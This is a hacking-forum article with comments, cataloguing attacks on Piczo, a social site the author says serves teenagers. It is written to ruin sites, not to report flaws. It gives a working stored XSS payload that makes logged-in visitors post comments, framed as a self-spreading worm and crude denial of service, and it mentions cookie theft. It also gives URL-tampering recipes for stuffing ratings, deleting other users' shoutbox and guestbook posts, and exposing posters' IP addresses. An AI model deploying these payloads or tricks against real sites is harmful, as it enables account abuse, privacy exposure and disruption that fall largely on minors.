Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Various Piczo vulnerabilities


Various Piczo vulnerabilities

By ghostghost | 7066 Reads |
0     0

This is basically a list of all the vulnerabilities and possible methods of attack I have found in the Piczo system. Although some of these may have been found and discovered by other people, I have not stolen thse off anyone.

Piczo is a social networking site mostly used by children aged 13-17, and is very poorly coded. There are even spelling mistakes in their code! :O Piczo currently has seven servers.

Most of the ways in which to exploit Piczo involves JavaScript injection and in-url hacking, where the url string is modified, and hence different data is sent to the Piczo servers.

1.A) Comment board xss attacks. This is probably the biggest threat to Piczo sites at the moment. All comment boards are currently vulnerable to cross site scripting, that is, you can post your won code, and it will be executed on the user’s machine when they view the site. I discovered this vulnerability just the other day, but I’m not sure if anyone else knows about it. I heard another guy called ProRatHack was also hacking comment boards or something :s

So what can we do with xss on Piczo? Well, you could be a lame n00b and use it for making alerts and pop up boxes on the person’s site, but that wouldn’t be too cool. Here’s the code for it anyway if you want to see it:

<SCRIPT LANGUAGE = "JavaScript">alert(" the text goes here");</SCRIPT>

As you can see it’s pretty simple, just define the code type and do what you want. Don’t forget you can string JavaScript commands together with a semi-colon. You could also use JavaScript to make the person’s comment board frame redirect to another site (think shock sites ;),and I’m sure you could also affect the parent frame, but I can’t be bothered to explain that now.

Okay, that’s the lame stuff out of the way, think about who normally uses Piczo…logged in Piczo users! And think…they will probably be logged in when they view the comment board…we could redirect them to a cookie stealer and take their session ids sure, but there is an easier and more fun attack we can try…

1.B) Comment board xss attacks – faking We can post messages as other users, or actually make them automatically post messages when they are viewing the infected comment board. First you have to understand how it works: http://pic6.piczo.com/go/commentonboard?cb=6295256&cbo=3245787&commentername=Santa&text=hello

Piczo comments for comment boards get sent to the servers in an url, very insecure. Now of course, we can change the name that is displayed, but that would be too easy and not very fun. Instead, we can make a logged user in Piczo that visits the site get redirected to the url that posts messages, so if you used the window.location command (window.open is not suitable here as most people have pop-up blockers), they would appear to be posting the message, as they server is getting sent a request from their logged in account ;)

So all we have to do is place one infected bit of code into the comment board, and anyone that visits the site will unwittingly post hundreds if not thousands of messages, and because there is no word limit on the comments, you can bomb the Piczo servers with data by doing this, hopefully resulting in a primitive form of DoS, basically using up all their bandwith, or even all there physical storage capacity.

So the resulting code would look like this: <SCRIPT LANGUAGE = "JavaScript"> window.location="http://pic6.piczo.com/go/commentonboard?cb=6258415&cbo=3928113&commentername=Santa&text=awwww you were hacked";</SCRIPT>

Of course, you would need to change the number after pic# (to define the server with the comment board you want to infect), the cb code, and the cbo code. Of course, you could make the other users post the code as well, which would make the code self replicating, and almost impossible to kill. At he moment I’m working on a better fully fledged version of this code, which will scout out other Piczo sites by scanning the friends’ list on the site, and hopefully spreading through all of Piczo 

2.Piczo ratings system Okay, you know those little boxes that people put on their sites, to make you vote for them, the type where there is a row of stars and the voting is instant? These are easy to fuck up. All you have to do is view source for the page on which the ratings box is, and then search (Ctrl + F) for ‘ratingsForm’, and it should hopefully lead you to something that looks like this:

<form id="ratingsForm348705431" name="website_1-10" action="http://pic4.piczo.com/go/ratemysite" method="POST"> <input type="hidden" name="rating_id" value="57752" /> <input type="hidden" name="rating_score" value="10"/> <input type="hidden" name="rating_method" value="component"> <input type="hidden" name="elapsed" value="0"/> </form>

See what it’s doing? It’s sending data to the address ‘http://pic4.piczo.com/go/ratemysite’, and this is what the url would look like with the data affixed:

http://pic4.piczo.com/go/ratemysite?rating_id=57752&rating_score=10&rating_method=component&elapsed= 0

How easy was that? Lol. So basically, we can change that all we want before it gets sent to the server. We can change ‘rating_score’ to 1, and vote for one star in the ratings box, and that url can be used for any ratings box with a little adjustment, all that needs to be changed is that pic# server identifier at the start, and the rating_id, which defines which ratings box to vote for. Also remember to change the ‘elapsed’ value to something like 20 000.

Now, how to vote for this site millions of times? The data telling Piczo whether you have voted for a certain site already is stored in a cookie, silly Piczo. So Just disable cookies in your browser (use the Web Developer extension for Firefox), and go to your voting url. Then just keep refreshing it to vote multiple times. But that would take long, so download the ‘reload every’ extension for Firefox and open that voting url in about 20 tabs. Then set each tab to reload once every minute .

3.Lots of hits for your site Too easy. Use an HTTP Traffic generator. www.nsauditor.com/web_tools_utilities/http_traffic_generator.html Just download the program, enter the site address, and it start. Nothing could be simpler.

4.Shoutbox ‘hacking’ Shoutboxes are very easy to destroy or ruin. You can delete other people’s posts.

  1. Find the url of the shoutbox, as you will need to view the actual generated source code for the shoutbox, so go on the Piczo page with the shoutobx, and view source for it, search for ‘go/shoutbox?sb=’, which should lead you to an url that looks like this (it’s tucked away in some iframe tags): http://pic6.piczo.com/go/shoutbox?sb=4780380&sbo=3245787

  2. Now that you have that, navigate your browser to it, and you should see only the full shoutbox on your screen. Now, view source again, and scroll down and look for the messages. Each message will have a unique postView number. Now copy down the numbers for the messages you want to delete, and stick them in this url: (first you need to replace the sb and sbo numbers with the ones from the shoutbox url you just used, and also use the correct pic# server identifier number, same as your shoutbox url from just now) Put the postView number of the message in the plpid parameter in the url string, now navigate your browser to it, and the message should get deleted 

http://pic6.piczo.com/go/editpostapproval?dba=y&shout=y&sbo=3245787&sb=4780380&plpid=46370739&approvalstatus=delete

4.B)Fun but a bit useless You still have the shoutbox url from earlier right? The one that looked like http://pic6.piczo.com/go/shoutbox?sb=4780380&sbo=3245787 ? if so, just add ‘&isedit=y’ to the end of the address, so it looks like this: http://pic6.piczo.com/go/shoutbox?sb=4780380&sbo=3245787&isedit=y Now, navigate to the new address. What do you notice? You can see the ip addresses of all the posters and also any messages that have been disapproved or hidden by the actual site owner :P

Also, you can add ‘&showWelcomeMessage=y’ to the end of the url to show the ‘you are logged in’ message.

  1. Guestbook ‘hacking’ Guestbooks can be ‘hacked’ using the same method described for the shoutbox trick. If you can’t work out how to modify the method to use it with guestbooks, you don’t deserver to have a computer. You can also use the javascript method, that is: deletePost(46372066) And replace the number with the correct one.

There are many more ways to ruin Piczo but I can’t be bothered to write anymore

Comments
ghost's avatar
ghost 17 years ago

Pretty good, but why is it in Windows XP Tweaks?

ghost's avatar
ghost 17 years ago

Nice article. and @ender, it's probably because that's the default set when you try to submit an article, so he probably forgot to change it. But other than that, good article, it covers a lot of different varities.

What_A_Legend's avatar
What_A_Legend 17 years ago

Also there is also another article on Piczo exploits and i don't really see a need to do any of these hacks.

ghost's avatar
ghost 17 years ago

Sorry for all the spelling mistakes and forgetting to change category

ghost's avatar
ghost 17 years ago

i fixed the placement…now under webhacking…w00t. nice article btw

ghost's avatar
ghost 17 years ago

I really like this article. I didn't try, but you found good exploits. Peace

Flaming_figures's avatar
Flaming_figures 17 years ago

Oh, btw, I never thought to put this in my article, but web dev is your best friend since they attempted to fix the exploit by putting the box in frames and stuff. (mozilla firefox web developer add-on is the best!)

R3M0T3 H4CK3R's avatar
R3M0T3 H4CK3R 16 years ago

almost 3 years ago i found some of those exploits for piczo and sent them patches, obviously they still haven't done anything about them. honestly their coders are so incompetent its almost criminal.

ghost's avatar
ghost 16 years ago

this article is shit :@

Night_Stalker's avatar
Night_Stalker 16 years ago

Dude, I could have copied and pasted various piczo hacking articles and said I wrote it too :)

And who here actually wants to hack piczo, I also sent them the exploits, and a simple script they could use as a temporary patch. They didn't use mine… But they at least fixed SOME of the vulnerabilities… only SOME… :D